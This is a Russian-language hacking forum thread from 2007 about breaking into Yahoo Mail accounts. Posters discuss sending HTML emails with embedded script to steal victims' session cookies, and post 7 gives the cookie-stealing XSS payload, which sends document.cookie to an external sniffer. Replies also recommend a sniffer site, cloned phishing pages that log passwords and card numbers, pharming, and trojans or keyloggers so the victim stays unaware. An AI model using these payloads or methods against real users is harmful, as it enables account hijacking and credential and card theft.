взлом yahoo.com

Discussion in 'Уязвимости Mail-сервисов' started by venix, 13 Mar 2007.

  1. venix

    venix New Member

    Joined:
    12 Mar 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Доброе время суток.
    Сразу говорю я новенький. :rolleyes:
    В поиске не нашол подобной инфы. Про xss прочитал. Видео тожи смотрел о подмене кукав. Вот решил на yahoo.com по тестить.

    В общем с моих тестов я увидел:
    - Если хтмл страницу выслать то в веб интерфейся она сразу открывается (и скрипты выполняются) :D , тоесть не надо сначало скачивать ее на хард.
    Теперь я ищу online снифер который ворует куки, чтоб потом свои заменить на жертвы.
    - Как я еще заметил куки (или сесия) весит 12 часов. Тоесть если зайти на почту зделать дисконект с инетом и опять соединиться (при этом остоваясь в веб интерфейсе почты) то сесия продолжается и нет не кокого повторного ре логина :)

    Теперь вопрос пройдет ли с куками такая ситуация? :confused:
    И как мне стащить куки ? (Античатовский не хочет работать)
     
  2. MINDFLY

    MINDFLY Banned

    Joined:
    18 Jun 2006
    Messages:
    19
    Likes Received:
    3
    Reputations:
    -15
    Ситуация с куками по идее должна пройти, если сессия не устареет после захода жертвы в свой ящик..

    Ищи в инете или ставь свой на своем сайте
     
    #2 MINDFLY, 13 Mar 2007
    Last edited: 13 Mar 2007
  3. nark0109

    nark0109 New Member

    Joined:
    10 Jan 2007
    Messages:
    8
    Likes Received:
    4
    Reputations:
    0
    http://tools.tehnofil.ru/ ---- снифер вот здезь
     
  4. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Сто раз уже это было описанно! типа копируешь страницу себе на сайт и редирект на нее устанавливаешь. Тогда так лохов богатых разводили на стильных шопах, юзер заходит на страницу, и вводит пароль\логин\номер креды (когда-то он должен его ввести - всегда будет вводить) а все это дерьмо ввиде паролей переходит на скрипт который запишет данные в фаил

    если скрипт выполняется значит ты уже скачал в память страницу и код выполнился в в твоем браузере
     
  5. nark0109

    nark0109 New Member

    Joined:
    10 Jan 2007
    Messages:
    8
    Likes Received:
    4
    Reputations:
    0
    А ты уверен что на УаНе нет фильтра на скрипты
     
  6. venix

    venix New Member

    Joined:
    12 Mar 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    tak po pariadku(izvenite translitom pishu, ia shas ne doma).


    " http://tools.tehnofil.ru/ " eto snifer malo info tianit s cookie, ili ia ploho razobralsia.


    "Сто раз уже это было описанно! типа копируешь страницу себе на сайт и редирект на нее устанавливаешь.
    Тогда так лохов богатых разводили на стильных шопах, юзер заходит на страницу, и вводит пароль\логин\номер
    креды (когда-то он должен его ввести - всегда будет вводить) а все это дерьмо ввиде паролей переходит на скрипт
    который запишет данные в фаил"

    Mozhno i Trojana brosit ili keylogger chob zapisival. Nado 4tob zhertva ne znala chto ee imeyut. :)

    "если скрипт выполняется значит ты уже скачал в память страницу и код выполнился в в твоем браузере"

    imelos drugoe, esli ti otpravil html stranicu v pisme to ona automatom otkroetsia, a ne nado nazhimat otkrit
    file. Chto oblegchaet rabotu.

    "А ты уверен что на УаНе нет фильтра на скрипты"

    tegi ne filtruiutsia. Ia vchera zapihival snifer v telo html stranici, i vse prekrasno rabotalo :)

    toest nado podhodiashi sniffer. Eh poidu regit site dlia sniffera.
     
    #6 venix, 13 Mar 2007
    Last edited: 13 Mar 2007
  7. venix

    venix New Member

    Joined:
    12 Mar 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    перепробывал уйму сниферов, но все без результата. Можит я что то не так делаю ? :( Xss как я понемаю заставить человека (по своей или не своей воле) перейти на картинку с снифферам. Я делаю так : создаю хтмл страницу в нее пихаю < script >img = new Image(); img. src = "адресс к снифферу"+escape(document.cookie); </ script>

    пробелы специально поставали. Потом отпровляю на адрес адрес@yahoo.com и в браузере открываю писмо. В писме автоматом открывается вложиная хтмл страница и по идеи запускаються скрипты и теги. :confused: Но вот я не пойму почему куки не утегиваются ? :confused: Если кто сталкивался с стакой проблемай то расскажите как ее решить.

    З.ы.
    Щас еще проверил с подменой куков, то на yahoo эта фишка работает.
     
  8. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Фарминг сейчас самый актуальный способ, почитай в теме разоблочение в важных.